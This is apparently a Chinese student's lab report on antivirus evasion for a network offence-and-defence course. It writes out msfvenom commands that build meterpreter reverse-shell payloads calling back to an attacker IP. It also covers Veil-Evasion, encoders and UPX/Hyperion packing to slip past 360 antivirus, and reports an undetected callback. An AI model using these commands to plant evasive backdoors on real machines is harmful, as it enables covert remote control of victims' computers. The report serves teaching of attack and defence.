20155233 《网络对抗技术》EXP3 免杀原理与实践
正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
- 使用msf编码器生成jar包
- 输入命令
msfvenom -p java/meterpreter/reverse_tcp lhost=LIinuxIP lport=端口号 x> 文件名.jar
- 查杀检测:可以看出较exe文件,jar文件的查出率较低些。
- 首先对exp2的木马程序进行查杀率检测:可以看出有一半引擎发现病毒,可以说我们做出的后门相当low了。
- Veil-Evasion安装:
- 输入
sudo apt-get install veil
安装veil,默认安装进行,一路y或者next; - 输入
sudo apt-get install veil-evasion
安装veil-evasion,可能会出现好多问题,希望你能一路next。
- Veil-Evasion免杀使用:
- 输入
veil
进入软件,输入use evasion
进入veil-evasion;
- 输入
use c/meterpreter/rev_tcp.py
生成可执行文件; - 设置反弹IP和端口号:
set LHOST linuxIP
:设置LHOST;
set LPORT 端口号
:设置LPORT;
generate
:生成。
- 输入文件名保存。
- 查杀率检测:可以看出大多数引擎没有检测到病毒,所以说使用veil还是有很多帮助的
- C语言调用Shellcode
- 输入命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.241.130 LPORT=443 -f c
调用shellcode
- 使用该数组编写一个程序(ha.c)
3.Linux平台交叉编译Windows应用(ha.exe)
- 返回连接测试:360检测到木马,信任后可以连接成功
- 结合使用不同编码器,连接成功。
msfvenom -p windows/meterpreter/reverse_https -e x86/bloxor LHOST=LinuxIP HPORT=端口号 -f c
- VC6.0(代替VisualStudio)
1.对ha.c进行修改(文件名:backdoor.cpp),参考教程
2.连接测试:连接成功,360未查出木马
通过组合应用各种技术实现恶意代码免杀
加壳
- 输入命令
upx 加壳前文件名.exe -o 加壳后文件名.exe
进行加壳
- 前后对比:并没有多大区别,尝试其他方式
加密壳Hyperion
- 找到veil-evasion下hyperion文件夹,进行操作
- 输入命令
wine hyperion.exe -v 加密前,exe 加密后.exe
进行加密壳操作
- 前后对比:较加密前增多,可见杀毒软件时刻在盯着大厂商的加密壳
用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
- 经过多番尝试,我们选择upx加壳后的backdoor1.exe进行实测
- 测试结果:其他电脑杀软未发现后门,杀软版本360.11
但是回连失败,原因是虚拟机一直ping不通对方电脑,只能回连自己电脑
基础问题回答
- 杀软是如何检测出恶意代码的?
答:应该是我们生成的shellcode有一段特征码,然后被杀软识别出来了。 - 免杀是做什么?
答:应该是将这段特征码进行修饰,使躲避杀软的查证。 免杀的基本方法有哪些?
答:多次编译、使用不同的编译器、加壳、加密壳、修改特征码等实践总结与体会
- 生成一个可执行后门程序很容易,但要做到免杀就很难了,你要考虑很多,各种方法都要去结合尝试,通过这几个实验尝试,有的方法反而增多了报毒率,适得其反,而且让后门自启动更是一个关键的问题。
离实战还缺些什么技术或步骤?
答:当然是如何让后门自启动,或者远程控制启动,更重要的是如何与杀软共从,长期存放。
20155233 《网络对抗技术》EXP3 免杀原理与实践的更多相关文章
- 20145215《网络对抗》Exp3 免杀原理与实践
20145215<网络对抗>Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 基于特征来检测:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有 ...
- 20155227《网络对抗》Exp3 免杀原理与实践
20155227<网络对抗>Exp3 免杀原理与实践 实践内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等 ...
- 20155232《网络对抗》Exp3 免杀原理与实践
20155232<网络对抗>Exp3 免杀原理与实践 问题回答 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 特征码:一段特征码就是一段或多段数据. 如果一个可执 ...
- 20155302《网络对抗》Exp3 免杀原理与实践
20155302<网络对抗>Exp3 免杀原理与实践 实验要求 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编 ...
- 20155323刘威良《网络对抗》Exp3 免杀原理与实践
20155323刘威良<网络对抗>Exp3 免杀原理与实践 实践内容 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellco ...
- 20155333 《网络对抗》Exp3 免杀原理与实践
20155333 <网络对抗>Exp3 免杀原理与实践 基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测: 启发式恶意软件检测: 基于行为的恶意软件检测. (2)免杀是做 ...
- 20145307陈俊达《网络对抗》Exp3 免杀原理与实践
20145307陈俊达<网络对抗>Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的 ...
- 20155218《网络对抗》Exp3 免杀原理与实践
20155218<网络对抗>Exp3 免杀原理与实践 一.使用msf生成后门程序的检测 (1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下: (2)使用msf时 ...
- 20155239吕宇轩《网络对抗》Exp3 免杀原理与实践
20155239吕宇轩<网络对抗>Exp3 免杀原理与实践 实验过程 Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.o ...
- 20155338《网络对抗》Exp3 免杀原理与实践
20155338<网络对抗>Exp3 免杀原理与实践 实验过程 一.免杀效果参考基准 Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.v ...
随机推荐
- UWP开发细节记录:DirectX::XMMATRIX 的坑
这两天写的代码概率性的崩溃在 XMMatrixMultiply() 函数,XMMatrixMultiply() 本身是 inline 函数可以看到崩溃处的代码: vX = _mm_mul_ps(vX, ...
- Array常用方法总结
一.[常用语法] 1.1.数组的创建var arrayObj = new Array(); //创建一个数组 var arrayObj = new Array([size]); //创建一个数组并指定 ...
- jQuery表格排序(tablesorter)
1.在html页面的head中引用 <script src="/static/Bootstrap/js/jquery/jquery.tablesorter.min.js"&g ...
- Linux命令一览
Linux系统中的命令参数有长短格式之分,长格式和长格式之间不能合并,长格式和短格式之间也不能合并,但短格式和短格式之间是可以合并的,合并后仅保留一个-(减号)即可. echo命令:用于在终端输出字符 ...
- [部署]VM11下CentOS7mini安装及配置
最近使用了CentOS发现比Ubuntu更简洁,有些爱上CentOS了 1. 准备一版CentOS安装镜像文件 官网下载地址:http://www.centos.org/download/ 官方有三个 ...
- Visual Studio内存泄露检測工具
使用简单介绍 在敲代码的过程中.难免会遇到内存泄露的时候.这个时候假设手工查找内存泄露,不说方法没有通用的,就是真的要自己手工查找也是非常耗时间和精力的.诚然.我们能够借助一些工具,并且我们还 ...
- BZOJ3569:DZY Loves Chinese II(线性基)
Description 神校XJ之学霸兮,Dzy皇考曰JC. 摄提贞于孟陬兮,惟庚寅Dzy以降. 纷Dzy既有此内美兮,又重之以修能. 遂降临于OI界,欲以神力而凌♂辱众生. 今Dzy有一魞歄图, ...
- BZOJ1922:[SDOI2010]大陆争霸(最短路)
Description 在一个遥远的世界里有两个国家:位于大陆西端的杰森国和位于大陆东端的 克里斯国.两个国家的人民分别信仰两个对立的神:杰森国信仰象征黑暗和毁灭 的神曾·布拉泽,而克里斯国信仰象征光 ...
- Guava 的EventBus示例代码(简单笔记,后期补充)
package guavademo.event.bus; import com.google.common.eventbus.EventBus; import com.google.common.ev ...
- Linux设置口令复杂度和口令定期更换策略
Linux 密码复杂度设置pam_pwquality.pam_passwdqc(centos7) 1.Linux对应的密码策略模块有:pam_passwdqc 和 pam_pwquality . 其中 ...